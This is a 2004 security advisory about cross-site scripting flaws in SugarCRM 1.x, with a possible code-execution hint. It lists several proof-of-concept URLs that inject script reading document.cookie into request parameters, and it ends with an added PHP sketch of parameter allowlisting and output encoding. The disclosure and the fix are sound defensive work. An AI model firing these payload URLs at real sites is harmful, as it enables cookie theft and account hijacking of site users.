Message-ID: <1104609524.17665.4.camel@nemobox>
From: joxeankoret at yahoo.es (Joxean Koret)
Subject: Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM

----------------------------------------------------------------------------
Cross Site Scripting Vulnerabilities and Possible Code Execution in SugarCRM
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SugarCRM 1.X - Manage leads, opportunities, contacts and more inside of a
state-of-the-art user interface. Built on PHP and MySQL

Web : http://sugarcrm.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability

A1. In the main script (index.php), various parameters that are used to
write the HTML code are not verified.

At least the following URLs are vulnerable to XSS (Cross Site Scripting)
attacks:

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module="><script>alert(document.cookie)</script>&return_action=index

http://<site-with-sugarcrm>/sugarcrm/index.php?module=Contacts&action=EditView&return_module=&return_action="><script>alert(document.cookie)</script>

http://<site-with-sugarcrm>/sugarcrm/index.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&address_city=&website=&phone=&action=ListView&query=true&module=Accounts&button=Search

And the following are vulnerable to XSS and, maybe, to arbitrary remote PHP
code execution as well:

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts"><script>alert(document.cookie)</script>&record=d676f046-1be5-dc36-114e-4138f972bf5d

http://<site-with-sugarcrm>/sugarcrm/index.php?action=DetailView&module=Accounts''''&record=[RECORD ID]"><script>alert(document.cookie)</script>

The fix:
~~~~~~~~

All problems are fixed in the latest versions available at the SugarCRM
site. Go to the http://sugarcrm.sourceforge.net site for more info about the
new versions.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
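
The verification that A1 reports as missing, sketched as an added example
(not code from the advisory or from SugarCRM): the request parameters named
in the URLs above are checked against allowlists or a format, then
HTML-encoded before being written into the page. The helper names, the
allowlist contents and the form markup are assumptions.

```php
<?php
// Added example, not SugarCRM code. Helper names and allowlists are assumptions.
const ALLOWED_MODULES = ['Accounts', 'Contacts'];
const ALLOWED_ACTIONS = ['index', 'EditView', 'DetailView', 'ListView'];

// Return $value only if it is a string present in $allowed, else $default.
function pick_allowed($value, array $allowed, string $default): string
{
    return (is_string($value) && in_array($value, $allowed, true)) ? $value : $default;
}

// Record ids in the advisory have the form d676f046-1be5-dc36-114e-4138f972bf5d.
function valid_record_id($value): bool
{
    return is_string($value)
        && preg_match('/\A[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\z/i', $value) === 1;
}

// Encode a value for HTML text or a quoted attribute.
function h($value): string
{
    return htmlspecialchars(is_string($value) ? $value : '', ENT_QUOTES, 'UTF-8');
}

// Constructed request, shaped like the URLs in the advisory.
$request = [
    'module'        => 'Accounts"><script>alert(document.cookie)</script>',
    'action'        => 'DetailView',
    'return_module' => '"><script>alert(document.cookie)</script>',
    'record'        => 'd676f046-1be5-dc36-114e-4138f972bf5d',
    'name'          => '"><script>alert(document.cookie)</script>',
];

// Fixed-vocabulary parameters fall back to a safe default when not allowlisted.
$module       = pick_allowed($request['module'] ?? null, ALLOWED_MODULES, 'Accounts');
$action       = pick_allowed($request['action'] ?? null, ALLOWED_ACTIONS, 'index');
$returnModule = pick_allowed($request['return_module'] ?? null, ALLOWED_MODULES, $module);
$record       = valid_record_id($request['record'] ?? null) ? $request['record'] : '';

// Validated values are still encoded on output; free text (name) relies on encoding alone.
echo '<input type="hidden" name="module" value="' . h($module) . '">' . "\n";
echo '<input type="hidden" name="action" value="' . h($action) . '">' . "\n";
echo '<input type="hidden" name="return_module" value="' . h($returnModule) . '">' . "\n";
echo '<input type="hidden" name="record" value="' . h($record) . '">' . "\n";
echo '<input type="text" name="name" value="' . h($request['name'] ?? '') . '">' . "\n";
```

Validating module and action against a fixed list also keeps request data
out of any later use of those values beyond HTML output.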